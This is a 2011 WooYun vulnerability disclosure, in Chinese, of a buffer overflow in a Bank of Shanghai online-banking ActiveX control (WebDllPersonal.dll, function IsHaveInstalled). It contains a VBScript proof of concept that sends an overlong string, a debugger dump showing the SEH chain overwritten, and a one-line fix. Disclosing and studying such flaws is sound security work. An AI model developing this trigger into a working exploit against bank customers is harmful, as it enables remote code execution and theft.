当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02751

漏洞标题:上海银行网银控件存在缓冲区溢出漏洞

相关厂商:上海银行

漏洞作者: fly@wolvez

提交时间:2011-08-31 21:57

修复时间:2011-09-30 21:57

公开时间:2011-09-30 21:57

漏洞类型:远程代码执行

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-08-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-09-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

上海银行网银控件存在缓冲区溢出漏洞,可用来制作网页木马,对上海银行用户进行定向攻击

详细说明:

网银控件包中的WebDllPersonal.dll是飞天诚信开发的用来支持usbkey的控件
其中IsHaveInstalled函数存在缓冲区溢出漏洞
Sub IsHaveInstalled (
ByVal strProductName As String
)

漏洞证明:

<object classid='clsid:6CF4C18B-D93D-4866-9A80-8E87AB491057' id='target' /></object>
<script language='vbscript'>
arg1=String(4116, "A")
target.IsHaveInstalled arg1
</script></job></package>

Exception Code: ACCESS_VIOLATION
Disasm: 7C809823 LOCK XADD [ECX],EAX (KERNEL32.dll)
Seh Chain:
--------------------------------------------------
1 41414141
Called From Returns To
--------------------------------------------------
KERNEL32.7C809823 41414141
Registers:
--------------------------------------------------
EIP 7C809823
EAX FFFFFFFF
EBX 00000000
ECX 41414149
EDX 00150608 -> 7C99E5C0
EDI 41414149
ESI 41414141
EBP 0013EDE4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0013ECC0 -> 00B52A26 -> Asc: &*&*
Block Disassembly:
--------------------------------------------------
7C80980F LOCK XADD [ECX],EAX
7C809813 INC EAX
7C809814 RETN 4
7C809817 LEA ECX,[ECX]
7C80981A MOV ECX,[ESP+4]
7C80981E MOV EAX,-1
7C809823 LOCK XADD [ECX],EAX <--- CRASH
7C809827 DEC EAX
7C809828 RETN 4
7C80982B LEA ECX,[ECX]
7C80982E MOV ECX,[ESP+4]
7C809832 MOV EDX,[ESP+8]
7C809836 MOV EAX,[ECX]
7C809838 LOCK CMPXCHG [ECX],EDX
7C80983C JNZ SHORT 7C809838
ArgDump:
--------------------------------------------------
EBP+8 41414141
EBP+12 41414141
EBP+16 41414141
EBP+20 41414141
EBP+24 41414141
EBP+28 41414141
覆盖到SEH链

修复方案:

限制变量长度

版权声明:转载请注明来源 fly@wolvez@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)